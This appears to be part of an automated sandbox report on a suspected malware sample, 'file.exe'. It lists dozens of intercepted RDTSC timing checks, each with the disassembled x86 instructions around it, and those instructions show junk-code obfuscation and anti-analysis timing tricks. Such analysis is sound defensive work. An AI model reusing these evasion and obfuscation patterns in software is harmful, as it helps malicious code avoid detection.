                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1258CC5 second address: 1258D16 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F39A52A2E58h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 lea eax, dword ptr [ebp+124895D4h] 0x0000002b mov dword ptr [ebp+122D1D71h], ecx 0x00000031 jl 00007F39A52A2E5Ch 0x00000037 mov edx, dword ptr [ebp+122D3B1Eh] 0x0000003d nop 0x0000003e pushad 0x0000003f jng 00007F39A52A2E5Ch 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1258D16 second address: 1240B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F39A52A77CCh 0x0000000a popad 0x0000000b push eax 0x0000000c jnc 00007F39A52A77DCh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F39A52A77C8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D17EDh], esi 0x00000033 call dword ptr [ebp+1245B534h] 0x00000039 jng 00007F39A52A77EEh 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240B85 second address: 1240B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A2E5Ch 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240B99 second address: 1240B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121EA4D second address: 121EA6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edx 0x00000007 ja 00007F39A52A2E56h 0x0000000d jns 00007F39A52A2E56h 0x00000013 pop edx 0x00000014 pushad 0x00000015 jne 00007F39A52A2E56h 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B436 second address: 128B43A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B43A second address: 128B440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B58D second address: 128B5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F39A52A77C6h 0x0000000c popad 0x0000000d jmp 00007F39A52A77D8h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B5B6 second address: 128B5BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B717 second address: 128B720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BB3C second address: 128BB5E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007F39A52A2E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F39A52A2E5Ah 0x00000013 jmp 00007F39A52A2E5Ah 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BB5E second address: 128BB62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BB62 second address: 128BB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A2E68h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BB84 second address: 128BB8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F39A52A77C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211070 second address: 1211076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211076 second address: 121107C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121107C second address: 1211087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291645 second address: 1291651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291651 second address: 1291657 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291657 second address: 129165D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291913 second address: 129193F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jp 00007F39A52A2E56h 0x0000000b jg 00007F39A52A2E56h 0x00000011 jmp 00007F39A52A2E69h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291BD7 second address: 1291BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291D24 second address: 1291D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 jmp 00007F39A52A2E5Ah 0x0000000b pushad 0x0000000c jo 00007F39A52A2E56h 0x00000012 jne 00007F39A52A2E56h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129138E second address: 129139A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007F39A52A77C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291FF4 second address: 1291FFE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129217D second address: 1292190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F39A52A77CEh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1292190 second address: 12921B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007F39A52A2E56h 0x0000000b jc 00007F39A52A2E56h 0x00000011 jmp 00007F39A52A2E5Dh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12921B1 second address: 12921CC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F39A52A77CEh 0x00000008 pushad 0x00000009 jno 00007F39A52A77C6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1292312 second address: 1292316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1292316 second address: 1292323 instructions: 0x00000000 rdtsc 0x00000002 js 00007F39A52A77C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1292633 second address: 1292637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299BAC second address: 1299BE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77CDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F39A52A77D4h 0x00000011 jmp 00007F39A52A77D1h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299BE7 second address: 1299C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F39A52A2E56h 0x0000000c jo 00007F39A52A2E56h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007F39A52A2E56h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299C04 second address: 1299C08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12985FB second address: 1298607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F39A52A2E5Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298607 second address: 129860D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129860D second address: 1298612 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298612 second address: 129861B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129861B second address: 129861F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298BEB second address: 1298BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298BF1 second address: 1298BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298BF8 second address: 1298BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298BFE second address: 1298C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298D2A second address: 1298D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77CCh 0x00000007 ja 00007F39A52A77C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F39A52A77CEh 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298D53 second address: 1298D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298FD5 second address: 1298FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77CBh 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298FE9 second address: 1298FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1298FED second address: 1299007 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129914A second address: 1299150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299150 second address: 1299154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12992D2 second address: 12992E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F39A52A2E5Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129943F second address: 1299445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299445 second address: 1299451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F39A52A2E56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299451 second address: 1299460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F39A52A77CEh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299598 second address: 129959C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129959C second address: 12995CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F39A52A77D3h 0x0000000b pop edx 0x0000000c jng 00007F39A52A77E6h 0x00000012 jnc 00007F39A52A77C8h 0x00000018 push eax 0x00000019 push edx 0x0000001a jne 00007F39A52A77C6h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12995CC second address: 12995D6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F39A52A2E56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12982AF second address: 12982BF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F39A52A77C6h 0x00000008 jns 00007F39A52A77C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129DA3B second address: 129DA6A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F39A52A2E71h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F39A52A2E58h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129DA6A second address: 129DA70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129DA70 second address: 129DA74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A0DFD second address: 12A0E07 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F39A52A77C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A0E07 second address: 12A0E10 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A0E10 second address: 12A0E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A2469 second address: 12A2498 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F39A52A2E5Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F39A52A2E65h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1217D53 second address: 1217D5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A4FD8 second address: 12A4FFB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F39A52A2E56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F39A52A2E67h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A5151 second address: 12A5179 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F39A52A77C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F39A52A77D8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A746C second address: 12A7476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A7476 second address: 12A7498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F39A52A77C6h 0x0000000a jmp 00007F39A52A77CBh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F39A52A77CAh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEC06 second address: 12AEC24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F39A52A2E5Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEC24 second address: 12AEC2E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F39A52A77CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEC2E second address: 12AEC35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEC35 second address: 12AEC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEDBD second address: 12AEDCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F39A52A2E5Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AF0D0 second address: 12AF11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77CAh 0x00000009 jmp 00007F39A52A77D3h 0x0000000e popad 0x0000000f jmp 00007F39A52A77D6h 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F39A52A77CDh 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12585C9 second address: 12585D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12585D2 second address: 1258625 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F39A52A77C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F39A52A77C8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 sbb di, 5528h 0x0000002b mov edx, edi 0x0000002d mov ebx, dword ptr [ebp+12489613h] 0x00000033 mov cx, 9DCDh 0x00000037 add eax, ebx 0x00000039 mov edx, dword ptr [ebp+122D39A2h] 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F39A52A77CAh 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1258625 second address: 125862A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125862A second address: 125865F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77D6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f movsx ecx, si 0x00000012 push 00000004h 0x00000014 mov ecx, 3DCED542h 0x00000019 mov dword ptr [ebp+122D2708h], ebx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AF5E9 second address: 12AF617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E66h 0x00000007 jmp 00007F39A52A2E5Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B38F3 second address: 12B38F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B38F7 second address: 12B3917 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F39A52A2E64h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B720A second address: 12B720E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B6A2B second address: 12B6A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B6BA0 second address: 12B6BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B6BA6 second address: 12B6BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A2E62h 0x00000009 jmp 00007F39A52A2E69h 0x0000000e popad 0x0000000f pushad 0x00000010 jns 00007F39A52A2E56h 0x00000016 jp 00007F39A52A2E56h 0x0000001c popad 0x0000001d push edi 0x0000001e jl 00007F39A52A2E56h 0x00000024 jg 00007F39A52A2E56h 0x0000002a pop edi 0x0000002b jbe 00007F39A52A2E5Eh 0x00000031 push edi 0x00000032 pop edi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF59A second address: 12BF5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF5A0 second address: 12BF5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 js 00007F39A52A2E56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD6F6 second address: 12BD6FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD8B8 second address: 12BD8D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F39A52A2E5Dh 0x00000011 rdtsc
